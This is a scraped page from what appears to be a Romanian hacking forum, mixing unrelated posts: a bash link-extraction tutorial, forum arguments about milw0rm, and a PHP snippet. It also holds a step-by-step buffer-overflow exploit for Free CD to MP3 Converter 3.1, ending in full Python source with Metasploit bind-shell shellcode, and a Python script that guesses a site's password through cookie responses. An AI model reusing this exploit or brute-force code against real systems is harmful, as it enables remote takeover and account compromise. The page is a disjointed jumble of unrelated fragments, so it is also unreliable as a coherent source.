Leaderboard

Linux Bash fun Programe folosite: wget,grep,bash,cat,cut,sort Sistem de operare necesar: Any Linux Distro Siteuri folosite:ICQ Sa zicem ca vedem un site, cu mai multe linkuri in el, si vrem sa salvam intr-un fisier in HDD-ul nostru linkurile acestea frumos, unul sub altul. Incepem prin a downloada pagina de pe care dorim sa luam acele linkuri pe HDD/SSD-ul nostru . Pentru asta trebuie sa pornim mai intai o consola. Asa ca apasati combinatia de taste Alt+F2 pentru a tasta comanda pentru lansarea unei aplicatii in Linux. Tin sa spun ca in Linux, din cauza ca este o distributie open-source, facuta de toti pentru toti, sunt foarte multe alternative de programe in oricare domeniu in care te-ai putea avanta intr-un distro Linux, asa ca voi da doar 3 exemple de "terminal emulators" - gnome-terminal(preferatul meu, default in GNOME) - konsole(este default in KDE) - xterm(despre care se spune ca este cel mai bun) Dupa ce ati ajuns in consola, putem incepe sa ne distram Prima comanda pe care o vom folosi se numeste wget. Daca doresti, poti scrie "man wget" sa afli mai multe despre acest mic program. Acum sa scriem: wget http://www.iana.org/domains/example/ Outputul tau ar trebui sa arate asa: root@bt:~/tutorial# wget http://www.icq.com --2011-07-22 15:59:20-- http://www.icq.com/ Resolving www.icq.com... 64.12.249.140 Connecting to www.icq.com|64.12.249.140|:80... connected. HTTP request sent, awaiting response... 302 Found Location: http://www.icq.com/en [following] --2011-07-22 15:59:20-- http://www.icq.com/en Reusing existing connection to www.icq.com:80. HTTP request sent, awaiting response... 200 OK Length: 45021 (44K) [text/html] Saving to: `index.html' 100%[==================================================================================================================>] 45,021 158K/s in 0.3s 2011-07-22 15:59:21 (158 KB/s) - `index.html saved [45021/45021] Ca sa verifici daca s-a downloadat fisierul, poti scrie ls -l sau dir si vedea daca fisierul numit index.html exista: root@bt:~/tutorial# ls -l total 4 -rw-r--r-- 1 root root 2945 2011-02-09 19:13 index.html Acum vom folosi programul numit Grep pentru a selecta anumite linii dintr-un fisier. Intr-un cod HTML, linkurile sunt precedate de href=, asta indicand computerului faptul ca urmeaza un link. Deci vom folosi Grep ca sa gasim doar liniile ce contin "href=: grep "href=" index.html Btw, la fel, poti folosi "man grep" pentru a afla mai multe informatii despre acest program. Daca totul a mers bine, ar trebui sa ai ca output linii de cod care contin "href=" Dar parca nu am ajuns unde vroiam nu? Si in plus avem si niste linii de cod ce nu au nicio legatura cu linkurile cautate. Pentru a "taia" ceea ce nu ne trebuie vom folosi un program numit cut. Citeste neaparat documentatia de la cut folosind comanda man cut ca sa intelegi mai bine cum functioneaza, si, ca de obicei, experimenteaza!!! Daca taiem liniile folosind delimitarea "/" in al treilea camp, si taiem apoi din nou folosind delimitarea '"' in primul camp, ar trebui sa fim mai aproape de ce dorim: root@bt:~/tutorial# grep "href=" index.html|cut -d"/" -f3|cut -d'"' -f1 fonts.googleapis.com ftp.icq.com www.icq.com download.icq.com download.icq.com www.icq.com download.icq.com www.icq.com www.icq.com download.icq.com download.icq.com www.icq.com www.icq.com www.icq.com www.icq.com games.icq.com games.icq.com icq.miniclip.com partner.bigpoint.net people.icq.com ...................... Se pare ca multe rezultate se repeta, si pe noi ne intereseaza doar serverele icq. Deci vom folosi grep din nou si sort. Again, nu uita sa citesti manualul: "man sort" Comanda, dupa cum am gandit, ar trebui sa arate in final asa: grep "href=" index.html|cut -d"/" -f3|cut -d'"' -f1|grep "icq.com"|sort -u Si outputul ar trebui sa fie simplu si curat, exact cum am vrut Si iata ca se pare ca am ajuns la sfarsitul acestui exercitiu. Binevoiesc critica constructiva si greseli de editat Next Episode: Linux Console Fun Continued Rep me if you like it ^^ Ma motiveaza

[+]Written By D4rk357 [+]Special thanks to Peter Van Eckhoutte for his awesome Exploit writing series . [+]Thanks to Fb1h2s for helping me out in the way [+]garage4hackers In this tutorial i will start from scratch and build a working exploit. A public exploit for this is already available here Free CD to MP3 Converter 3.1 Buffer Overflow Exploit First step is downloading and installing the vulnerable application from here Application Install Immunity Debugger or ollydbg or windbg anyone of it would do . Now we will write a simple python code which will generate a .wav file and test the application against it . handle=open("crash.wav","a") Crap="\x41"*30000 handle.write(Crap) This little code upon execution will generate a file with the name of crash.wav Open the debugger of your choice in my case immunity debugger . Open the Executable of CD to MP3 converter and then click on execute. Open: Execute: Now open your Crash.wav file in CD to MP3 converter in option wav to wav converter and BOOM the application Dies instantly . NOw check your Debugger for what exactly happened . Woot Woot Eip has been overwritten . Not only EIP but a few more registers have been overwritten thus increasing our chance to make a Working exploit for this vulnerability. Now The next step is to determine the Exact position at which EIP is overwritten . For that We will use a couple of tools which comes with metasploit . On windows Platform Open Cygwin and then browse to tools directory of metasploit. Once inside it execute pattern_create.rb script which generates unique characters of whichever size you want . By reducing the size of crap again and again in my script and getting a crash i figured it out a string of 5000 unique characters will be more than enough. Syntax: ./pattern_create.rb 5000 once the pattern is created copy it and put it in place of Crap . Now Execute the application from debugger again and put in the newly generated Crash.wav(Delete previous Crash.wav file before doing it as i am opening the file in append mode). Check the Debugger again and you can see some numbers in the EIP which in my case is 31684630 Now in Cygwin Shell we will run pattern_offset to check where exactly EIP is being overwritten . Syntax: ./pattern_offset.rb 31684630 5000 And the location it gives me is 4112 great. So Just to Cross Check that the position of EIP given by the tool is correct we will write a small script . handle=open("crash.wav","a") Crap="\x41"*4112 Eip="\x42"*4 handle.write(Crap) Again open the program through immunity debugger Execute it . After the application crashes check the Eip and you find there 42424242 which means the address found by the tool is perfect . Now we have to find the location of a command in dll file which calls/goes to esp like jmp esp etc. Now we will load the the application again in debugger and search jmp esp command in every dll that is being loaded .( In immunity debugger we can take a look at executable module screen and double click on each dll that is being loaded and then search for the specific command in that address space. After some tinkering out we will find that the dll winmm.dll has a jmp esp command at 76B43ADC Great now we have almost everything we need to make a workable exploit . the address 76 B4 3A DC will be mentioned as \xDC \x3A \xB4 \x76 since we are passing it as a string to EIP . We will use win32 bind shell provided by metasploit encoded in alpha2 encoder We will add some NOPS ( no operation bytes) before starting our shellcode because generally some bytes at the starting are not interpreted by processor as command so it could cause our exploit to fail . Adding Nops would increase the reliability of exploit . And we get a telnet connection \m/ [P.S] You will have to write your own exploit(modify EIP) as i used a hard coded address Dont Try Post Mortem degubbing .. Debugger is not catching it ( Atleast in my computer) P.S here's the source Code: handle=open("final.wav","a") Crap="\x41"*4112 Eip="\xDC\x3A\xB4\x76" # win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com ShellCode=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x43" "\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x53\x32\x41\x42\x41\x32" "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x62" "\x4a\x48\x6b\x70\x4d\x38\x68\x6c\x39\x4b\x4f\x79\x6f\x6b\x4f\x73" "\x50\x4c\x4b\x72\x4c\x46\x44\x57\x54\x4e\x6b\x31\x55\x67\x4c\x4e" "\x6b\x63\x4c\x34\x45\x62\x58\x46\x61\x48\x6f\x4e\x6b\x50\x4f\x44" "\x58\x6c\x4b\x51\x4f\x45\x70\x44\x41\x6a\x4b\x70\x49\x6e\x6b\x35" "\x64\x4c\x4b\x53\x31\x78\x6e\x75\x61\x6b\x70\x4f\x69\x6e\x4c\x4b" "\x34\x4f\x30\x53\x44\x57\x77\x6f\x31\x4b\x7a\x74\x4d\x75\x51\x69" "\x52\x68\x6b\x48\x74\x57\x4b\x70\x54\x64\x64\x47\x58\x50\x75\x6d" "\x35\x4c\x4b\x31\x4f\x36\x44\x56\x61\x78\x6b\x63\x56\x6c\x4b\x54" "\x4c\x70\x4b\x4e\x6b\x53\x6f\x75\x4c\x47\x71\x5a\x4b\x63\x33\x54" "\x6c\x4e\x6b\x6b\x39\x30\x6c\x44\x64\x35\x4c\x71\x71\x5a\x63\x34" "\x71\x6b\x6b\x72\x44\x6c\x4b\x37\x33\x76\x50\x4e\x6b\x71\x50\x56" "\x6c\x6c\x4b\x44\x30\x65\x4c\x4c\x6d\x4c\x4b\x77\x30\x35\x58\x61" "\x4e\x62\x48\x6c\x4e\x62\x6e\x44\x4e\x38\x6c\x50\x50\x4b\x4f\x5a" "\x76\x45\x36\x70\x53\x41\x76\x32\x48\x70\x33\x56\x52\x45\x38\x42" "\x57\x72\x53\x34\x72\x63\x6f\x72\x74\x6b\x4f\x78\x50\x72\x48\x38" "\x4b\x58\x6d\x6b\x4c\x65\x6b\x42\x70\x49\x6f\x69\x46\x71\x4f\x6c" "\x49\x6a\x45\x65\x36\x4f\x71\x4a\x4d\x35\x58\x53\x32\x50\x55\x32" "\x4a\x35\x52\x49\x6f\x48\x50\x31\x78\x7a\x79\x36\x69\x4c\x35\x6c" "\x6d\x70\x57\x39\x6f\x6e\x36\x70\x53\x32\x73\x62\x73\x56\x33\x52" "\x73\x73\x73\x52\x73\x33\x73\x30\x53\x6b\x4f\x4a\x70\x35\x36\x75" "\x38\x52\x31\x41\x4c\x61\x76\x50\x53\x4d\x59\x4d\x31\x4d\x45\x55" "\x38\x69\x34\x56\x7a\x42\x50\x5a\x67\x36\x37\x79\x6f\x7a\x76\x61" "\x7a\x76\x70\x66\x31\x73\x65\x39\x6f\x68\x50\x41\x78\x4d\x74\x4e" "\x4d\x76\x4e\x68\x69\x42\x77\x79\x6f\x59\x46\x36\x33\x66\x35\x69" "\x6f\x6e\x30\x45\x38\x4b\x55\x51\x59\x6f\x76\x72\x69\x42\x77\x6b" "\x4f\x4a\x76\x70\x50\x46\x34\x36\x34\x53\x65\x79\x6f\x6e\x30\x6c" "\x53\x65\x38\x4b\x57\x70\x79\x5a\x66\x52\x59\x30\x57\x69\x6f\x6a" "\x76\x30\x55\x59\x6f\x6e\x30\x70\x66\x70\x6a\x53\x54\x72\x46\x62" "\x48\x65\x33\x50\x6d\x6c\x49\x4d\x35\x31\x7a\x52\x70\x70\x59\x44" "\x69\x7a\x6c\x4c\x49\x69\x77\x51\x7a\x71\x54\x4f\x79\x4b\x52\x34" "\x71\x39\x50\x4c\x33\x4d\x7a\x6b\x4e\x71\x52\x44\x6d\x6b\x4e\x37" "\x32\x54\x6c\x4e\x73\x4e\x6d\x33\x4a\x56\x58\x6c\x6b\x6c\x6b\x6e" "\x4b\x53\x58\x64\x32\x69\x6e\x6c\x73\x44\x56\x6b\x4f\x73\x45\x47" "\x34\x4b\x4f\x79\x46\x33\x6b\x42\x77\x73\x62\x30\x51\x73\x61\x72" "\x71\x62\x4a\x33\x31\x42\x71\x50\x51\x72\x75\x50\x51\x49\x6f\x78" "\x50\x71\x78\x4e\x4d\x39\x49\x75\x55\x6a\x6e\x70\x53\x4b\x4f\x59" "\x46\x32\x4a\x4b\x4f\x49\x6f\x56\x57\x69\x6f\x5a\x70\x4e\x6b\x33" "\x67\x49\x6c\x6d\x53\x39\x54\x55\x34\x39\x6f\x4b\x66\x31\x42\x69" "\x6f\x4a\x70\x62\x48\x78\x70\x4d\x5a\x35\x54\x63\x6f\x70\x53\x39" "\x6f\x4e\x36\x39\x6f\x38\x50\x43") nops="\x90"*50 handle.write(Crap+Eip+nops+ShellCode) #Sursa: aici.

Tutorial intended for beginners. Personal note: I liked it very much because it is friendly with the noob, and does not put any `academic pressure' as real books put (by using hard terminology etc.). Beej's Guide to C Programming PDF [us Letter, one sided]: http://beej.us/guide/bgc/output/print/bgc_USLetter.pdf Enjoy =]

1) Pui prea multe emoticoane 2) Faci "idiot" pe oricine iti spune ceva 3) Ai aere dar nu poti dovedi nimic legat de milw0rm Inca un post ca cele de mai sus si ai ban.

@icebird Admitere 2011 Nivel Licenta -> Criterii de selectie (Te poti uita si la Facilitati pentru absolventi daca ai ceva diplome )

Ia spune-mi cum il chema pe owneru de la milw0rm (cel care a avut ideea). Si cati s-au ocupat de site inca din prima zi dupa deschidere. Ia zi cate servere avea milw0rm si unde era hostat. Odata ce faceai pen-testing pe ele, sunt sigur ca stiai detaliile astea. Si ce distributie de linux folosea serverul/ele lor.(asta ca sa ti dau un indiciu). Am sa fiu mai putin sceptic cand imi vei raspunde la astea.

Ce mor?ii mei de tutorial ai nevoie pentru a folosi un keylogger ? Dac? cineva nu e în stare s? dea dou?-trei click-uri, atunci s? sting? calculatoru' ?i s? ias? p-afar?. Ce rahat e atât de greu s? bagi un rahat de proxy în set?rile browser-ului ?i s? fii anonymous prin serverele nasa ? ?i prin „sa faca SQL Injection pe pagini de logare ale administratorilor” ce vroiai s? spui ? SQLi se poate face oriunde este un parametru... „instabil”, s?-i spunem a?a. Chestiile de aici sunt publice, oricine le poate citi. Ai „96” pe toate id-urile ?i tu spui c? ai 19 ani. Credibil, de ce nu ? ?i chiar dac-ai fi f?cut tu parte din echipa milw0rm, vreodat?, de ce tocmai tu te-ai înregistrat aici ? P.S. : în linux, se nume?te terminal, nu cmd.

Uploaded with ImageShack.us m-am folosit de lungimea data de em, sa nu o mai scot eu inca o data import urllib2 import string import time target = "http://crs12decoder.comoj.com/findpw.php" ALPHA = 'abcdefghijklmnopqrstuvwxyz' currentpassword = ['a' for i in range(391)] for i in range(391): currentpassword[i] = 'a' def trypassword(letter): global currentpassword, target temp = '' for i in range(391): temp += letter opener = urllib2.build_opener() opener.addheaders.append(('Cookie','pw=' + temp)) try: f = opener.open(target) except: print 'Connection Timed Out' trypassword(letter) lines = f.readline() chars = lines.split('</span>') for i in range(391): if 'green' in chars[i]: currentpassword[i] = letter for letter in ALPHA: print 'Trying', letter trypassword(letter) password = '' for i in currentpassword: password += i print password

Clipurile le pui in partea asta: //bagam codul clipului in vector $clipuri = array( 0 => "wK2U0dYZeQI", 1 => "YFK6H_CcuX8", 2 => "ctLnNQOVg0E" ); Ce vezi tu aici, este ce vine in link-ul http://www.youtube.com/watch?v=PoTEnaAI9Fo, de exemplu, dupa v=. Tu doar pui in continuare, de exemplu: /bagam codul clipului in vector $clipuri = array( 0 => "wK2U0dYZeQI", 1 => "YFK6H_CcuX8", 2 => "ctLnNQOVg0E", 3 => "PoTEnaAI9Fo" ); Mai jos, modifici //alegem la intamplare un cod din vector $rand = $clipuri[rand(0,3)]; Practic, linia asta spune sa ia un clip aleatoriu, de la 0 la 3. Daca ai... 1000 de videoclipuri, pui (0,1000). Daca vrei doar... 100 din ele, si alea sunt de la.. 100 la 199, pui (100,199). Cam atat. PS: Bravo lui Synthesis.

Multiupload.com - upload your files to multiple file hosting sites!